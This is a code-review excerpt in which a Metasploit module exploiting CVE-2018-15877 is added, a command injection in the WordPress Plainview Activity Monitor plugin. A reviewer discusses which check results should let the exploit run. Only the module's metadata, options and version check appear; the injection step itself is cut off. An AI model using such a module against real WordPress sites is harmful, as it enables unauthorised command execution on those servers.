modules/exploits/unix/webapp/wp_plainview_activity_monitor_rce.rb

```diff
@@ -0,0 +1,104 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::Remote::HttpClient
+
+  Rank = ExcellentRanking
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Wordpress Plainview Activity Monitor RCE',
+      'Description'    => %q{
+          Plainview Activity Monitor Wordpress plugin is vulnerable to OS
+          command injection which allows an attacker to remotely execute
+          commands on underlying system. Application passes unsafe user supplied
+          data to ip parameter into activities_overview.php.
+          Privileges are required in order to exploit this vulnerability.
+      },
+      'Author'	=>
+        [
+          'LydA(c)ric LEFEBVRE', # Vulnerability discovery
+          'Leo LE BOUTER', # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2018-15877' ],
+          [ 'EDB', '45274' ],
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Payload'        =>
+        {
+          'BadChars' => '&>\'',
+        },
+      'Targets'        => [['WordPress', {}]],
+      'DisclosureDate' => 'Aug 26 2018'
+      ))
+
+      register_options(
+        [
+          OptString.new('USERNAME', [ true,  "The user to authenticate as"]),
+          OptString.new('PASSWORD', [ true,  "The password to authenticate with" ])
+        ])
+
+      register_advanced_options(
+        [
+          OptBool.new('ForceExploit',  [ false, 'Override check result', false ]),
+        ])
+  end
+
+  def check
+    unless wordpress_and_online?
+      vprint_error("#{target_uri} does not seeem to be Wordpress site")
+      return CheckCode::Unknown
+    end
+    check_plugin_version_from_readme('plainview-activity-monitor', '20180826')
+  end
+
+  def exploit
+    unless check == CheckCode::Detected
```

Comment:
`check_plugin_version_from_readme` can return the following `Msf::Exploit::CheckCode`:
- `Unknown`
- `Detected`
- `Appears`
- `Safe`

Please, see the descriptions here: https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-check()-method#check-codes

So, you can decide to be restrictive and run the exploit only if we are certain this version is vulnerable (`Appears`). Or, be more flexible and also try to exploit if we detected it is a Wordpress but we're not able to get the version (add `Detected` and/or `Unknown` to the list). Or, simply bail out if we are `Safe`. It's up to you.

The way it behaves now is that only `Detected` allows to run the exploit. At least, `Appears` should be on the list.

Reply:
Hopefully it's good now!

Reply:
Awesome! Thanks!